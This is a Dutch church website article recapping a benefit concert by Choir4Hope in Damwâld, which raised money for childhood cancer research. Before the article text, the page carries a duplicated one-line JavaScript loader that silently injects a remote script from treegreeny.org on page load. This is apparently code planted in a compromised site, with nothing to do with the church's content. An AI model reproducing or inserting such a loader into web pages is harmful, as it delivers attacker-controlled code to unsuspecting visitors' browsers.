;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Terugblik zangavond met Choir4Hope uit Barneveld, aangevuld met leden van het Inspire2LiveChoir - PKN Damwâld

Terugblik zangavond met Choir4Hope uit Barneveld, aangevuld met leden van het Inspire2LiveChoir

Gepubliceerd op: woensdag 9 november 2022

Op 22 oktober was het zover en kon het koor optreden nadat het eerder in maart 2020 niet kon doorgaan door Corona. Corona is helaas ook aan deze koren niet voorbij gegaan en beide kampen met minder leden. Omdat was toegezegd met ongeveer 100 zangers te komen, werd Choir4Hope aangevuld met zangers uit het 2e koor van de dirigent (Peter Overduin) uit Alblasserdam. Vooraf had de organisatie veel aandacht voor het optreden gevraagd en gekregen van de vele media en er zijn voor het eerst flyers uitgedeeld op veel plekken (m.n. winkels) in o.a. Damwald en Dokkum. Dit alles om zoveel mogelijk mensen te bereiken en in te lichten. Een volle kerk om voor te zingen en evangeliseren, met veel samenzang, dat is onze doelstelling! Corona heeft ook het publiek geraakt dat op deze optredens afkomt. Sommigen zijn misschien nog steeds bang om naar druk bezochte evenementen te gaan. Toch was de opkomst zeer goed.

Het werd in alle opzichten een geweldige en inspirerende avond! Dat kwam omdat het koor een prachtig en geweldig optreden verzorgde, bijgestaan door een voortreffelijke organist Jacob Schenk, en niet in de laatste plaats door de vele bezoekers die aanwezig waren (een kleine 400). Beide solisten, sopraan Annelies Schep en bariton Sierk Krol, brachten het publiek in verrukking met hun geweldige zang. Het werd nog mooier toen Annelies tot slot de zegenbede ten gehore bracht, om stil van te worden! Dit alles werd geleid door 2 personen die elkaar op een leuke manier probeerden de loef af te steken. Dirigent Peter Overduin en presentator Jan van der Meer werkten uitstekend samen en zoals Jan zei: “jij het koor en ik de kudde”, daarmee verwoordde hij het goed. Beiden kweten zich prima en enthousiast van hun taak. Ook daardoor was de sfeer zeer ongedwongen en vrolijk en dat leidde tot enthousiasme bij iedereen.

Zoals u misschien weet, zingen beide koren voor goede doelen en deze keer (weer) voor bestrijding van en onderzoek naar kanker bij kinderen via het Prinses Maxima Centrum te Utrecht. Dat was duidelijk bekend bij het publiek, want aan het eind van de avond kon de organisatie een cheque uitreiken van maar liefst 2500 euro. Fantastisch, iedereen hartelijk dank! Dat bedrag was mede mogelijk, omdat er sponsoren bereid waren te doneren voor o.a. de kosten die moesten worden gemaakt. Via ons programmaboekje zijn zij bij u bekend en wij danken ook hen hartelijk. Die boekjes, maar ook elke keer het cadeautje bij de uitgang, zijn bijna verzamel objecten aan het worden.

En dan zijn er zo als altijd de onmisbare personen, die vrijwillig veel werk verzetten. Een vaste groep, waaruit wij putten en die altijd meteen klaar staat en zich nu al voor de volgende editie opgeeft. De hoekstenen van onze maatschappij, voor ons als organisatie en voor u als bezoekers en daarom ook jullie hartelijk dank. Hartelijk dank aan onze koster Peter die zijn zaakjes alle avonden heel goed voor elkaar had en deze keer voor het laatst, want Drees komt over enkele weken langs.
Als organisatie kregen wij weer zeer positieve reacties; mensen waren niet alleen enthousiast maar ook geroerd door zoveel mooie momenten, zang, verhalen (met name van Jan over een doodziek jongetje dat hij mocht begeleiden) en het samen zijn. Die reacties waren er ook voor het koor, dat zelf ook zeer ingenomen was met alles die middag en avond in Damwald.

Wij nodigen u die aanwezig was opnieuw uit voor het volgende optreden op 18 maart 2023 van Christelijk Mannenkoor ’t Harde. Echter, we willen graag ook anderen uitnodigen om met ons te genieten. Dit moet u (ook of weer) meemaken, zoveel positiefs en saamhorigheid en dat kunnen we allemaal wel gebruiken in deze moeilijke tijden, hier dichtbij maar ook veraf.

Bovenal danken wij onze Heer, die deze prachtige avond mogelijk maakte en u en ons daarvoor heeft ingeschakeld.

Tot ziens op 18 maart!